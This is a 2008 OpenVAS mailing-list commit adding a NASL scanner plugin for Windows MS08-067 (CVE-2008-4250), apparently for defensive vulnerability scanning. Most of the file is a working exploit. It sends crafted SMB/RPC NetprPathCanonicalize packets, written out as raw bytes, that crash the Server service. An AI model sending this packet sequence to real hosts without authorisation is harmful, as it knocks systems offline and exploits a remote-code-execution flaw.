[Openvas-commits] r1650 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Thu Oct 30 14:46:46 CET 2008
Author: chandra
Date: 2008-10-30 14:46:44 +0100 (Thu, 30 Oct 2008)
New Revision: 1650
Added:
trunk/openvas-plugins/scripts/secpod_ms08-067_900056.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added exploit code for MS08-067
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2008-10-30 06:04:47 UTC (rev 1649)
+++ trunk/openvas-plugins/ChangeLog 2008-10-30 13:46:44 UTC (rev 1650)
@@ -1,4 +1,8 @@
2008-10-30 Chandrashekhar B <bchandra at secpod.com>
+ * scripts/secpod_ms08-067_900056.nasl:
+ Exploit code for MS08-067
+
+2008-10-30 Chandrashekhar B <bchandra at secpod.com>
* scripts/gb_vlc_media_player_ty_bof_vuln_win.nasl,
scripts/gb_phpwebgallery_mult_vuln_oct08.nasl,
scripts/gb_vlc_media_player_ty_bof_vuln_lin.nasl:
Added: trunk/openvas-plugins/scripts/secpod_ms08-067_900056.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms08-067_900056.nasl 2008-10-30 06:04:47 UTC (rev 1649)
+++ trunk/openvas-plugins/scripts/secpod_ms08-067_900056.nasl 2008-10-30 13:46:44 UTC (rev 1650)
@@ -0,0 +1,277 @@
+##############################################################################
+#
+# Vulnerability in Server Service Could Allow Remote Code Execution (958644)
+#
+# Copyright: SecPod
+#
+# Date Written: 2008/10/30
+#
+# Revision: 1.i0
+#
+# Log: schandan
+# Issue #0412
+# ------------------------------------------------------------------------
+# This program was written by SecPod and is licensed under the GNU GPL
+# license. Please refer to the below link for details,
+# http://www.gnu.org/licenses/gpl.html
+# This header contains information regarding licensing terms under the GPL,
+# and information regarding obtaining source code from the Author.
+# Consequently, pursuant to section 3(c) of the GPL, you must accompany the
+# information found in this header with any distribution you make of this
+# Program.
+# ------------------------------------------------------------------------
+##############################################################################
+
+if(description)
+{
+ script_id(900056);
+ script_bugtraq_id(31874);
+ script_cve_id("CVE-2008-4250");
+ script_copyright(english:"Copyright (C) 2008 SecPod");
+ script_version("Revision: 1.0 ");
+ script_category(ACT_DENIAL);
+ script_family(english:"Windows");
+ script_name(english:"Vulnerability in Server Service Could Allow Remote Code Execution (958644)");
+ script_summary(english:"Check for Remote Code Execution (Exploit)");
+ desc["english"] = "
+ MS08-067
+
+ Overview: This host has critical security update missing according to
+ Microsoft Bulletin MS08-067.
+
+ Vulnerability Insight:
+ Flaw is due to an error in the Server Service, that does not properly
+ handle specially crafted RPC requests.
+
+ Impact: Successful exploitation could allow remote attackers to take
+ complete control of an affected system.
+
+ Impact Level: System
+
+ Affected Software/OS:
+ Microsoft Windows 2K Service Pack 4 and prior.
+ Microsoft Windows XP Service Pack 3 and prior.
+ Microsoft Windows 2003 Service Pack 2 and prior.
+
+ Fix: Run Windows Update and update the listed hotfixes or download
+ and update mentioned hotfixes in the advisory from the below link,
+ http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
+
+ References:
+ http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
+
+ CVSS Score:
+ CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C)
+ CVSS Temporal Score : 7.3
+ Risk factor : High";
+
+ script_description(english:desc["english"]);
+ script_dependencies("secpod_reg_enum.nasl");
+ exit(0);
+}
+
+
+include("smb_nt.inc");
+
+if(safe_checks()){
+ exit(0);
+}
+
+name = kb_smb_name();
+login = kb_smb_login();
+pass = kb_smb_password();
+domain = kb_smb_domain();
+port = kb_smb_transport();
+
+soc = open_sock_tcp(port);
+if(!soc){
+ exit(0);
+}
+
+if(!login)login = "";
+if(!pass) pass = "";
+
+r = smb_session_request(soc:soc, remote:name);
+if(!r) { close(soc); exit(0); }
+
+prot = smb_neg_prot(soc:soc);
+if(!prot){ close(soc); exit(0); }
+
+r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);
+if(!r)
+{
+ close(soc);
+ report = string("MS08-067: Failed to perform Clear Text based authentication.");
+ security_note(data:report, port:port);
+ exit(0);
+}
+
+uid = session_extract_uid(reply:r);
+if(!uid)
+{
+ close(soc);
+ exit(0);
+}
+
+r = smb_tconx(soc:soc, uid:uid, share:"IPC$", name:name);
+if(!r)
+{
+ close(soc);
+ exit(0);
+}
+
+tid = tconx_extract_tid(reply:r);
+if(!tid)
+{
+ close(soc);
+ exit(0);
+}
+
+tid_high = tid / 256;
+tid_low = tid % 256;
+uid_high = uid / 256;
+uid_low = uid % 256;
+
+# \srvsvc Request
+req = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x08,
+ 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d,
+ uid_low, uid_high, 0x0b, 0x00, 0x18, 0xff, 0x00, 0x00,
+ 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,
+ 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x02, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x5c, 0x00,
+ 0x73, 0x00, 0x72, 0x00, 0x76, 0x00, 0x73, 0x00, 0x76, 0x00,
+ 0x63, 0x00, 0x00, 0x00);
+
+req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
+send(socket:soc, data:req);
+resp = smb_recv(socket:soc, length:4096);
+if(strlen(resp) < 107)
+{
+ close(soc);
+ exit(0);
+}
+
+fid_low = ord(resp[42]);
+fid_high = ord(resp[43]);
+
+# srvsvc Bind Request
+req = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08,
+ 0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d,
+ uid_low, uid_high, 0x0c, 0x00, 0x10, 0x00, 0x00, 0x48,
+ 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x48,
+ 0x00, 0x52, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high,
+ 0x57, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50,
+ 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x0b,
+ 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x05,
+ 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00, 0x00,
+ 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8,
+ 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a,
+ 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04,
+ 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08,
+ 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00);
+
+req = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;
+send(socket:soc, data:req);
+smb_recv(socket:soc, length:4096);
+
+# ntrPathCanonicalize Request (With Malicious Code)
+req = raw_string(
+0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x08,
+0x01, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xa2, 0x4d,
+uid_low, uid_high, 0x0d, 0x00, 0x10, 0x00, 0x00, 0x74, 0x04, 0x00, 0x00, 0xb8, 0x10, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x74, 0x04, 0x52,
+0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x83, 0x04, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49, 0x00,
+0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
+0x74, 0x04, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x5c, 0x04, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x00,
+0x00, 0x00, 0x02, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00,
+0x31, 0x00, 0x37, 0x00, 0x32, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x36, 0x00, 0x2e, 0x00, 0x31, 0x00,
+0x2e, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x06, 0x02, 0x00, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x63, 0x00, 0x5c, 0x00, 0x2e, 0x00,
+0x2e, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00,
+0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x63, 0x00, 0x00, 0x00,
+0x10, 0x27, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00);
+
+req = raw_string(0x00, 0x00, 0x04, 0xc6) + req;
+send(socket:soc, data:req);
+resp = smb_recv(socket:soc, length:4096);
+
+if(ord(resp[5]) == 83 && ord(resp[6]) == 77 && ord(resp[7]) == 66)
+{
+ close(soc);
+ exit(0);
+}
+else
+{
+ security_note(data:string("Windows Server service has crashed on the system.\n" +
+ "Restart the service to resume normal operations."), port:port);
+ security_hole(port);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_ms08-067_900056.nasl
___________________________________________________________________
Name: svn:executable
+ *
More information about the Openvas-commits
mailing list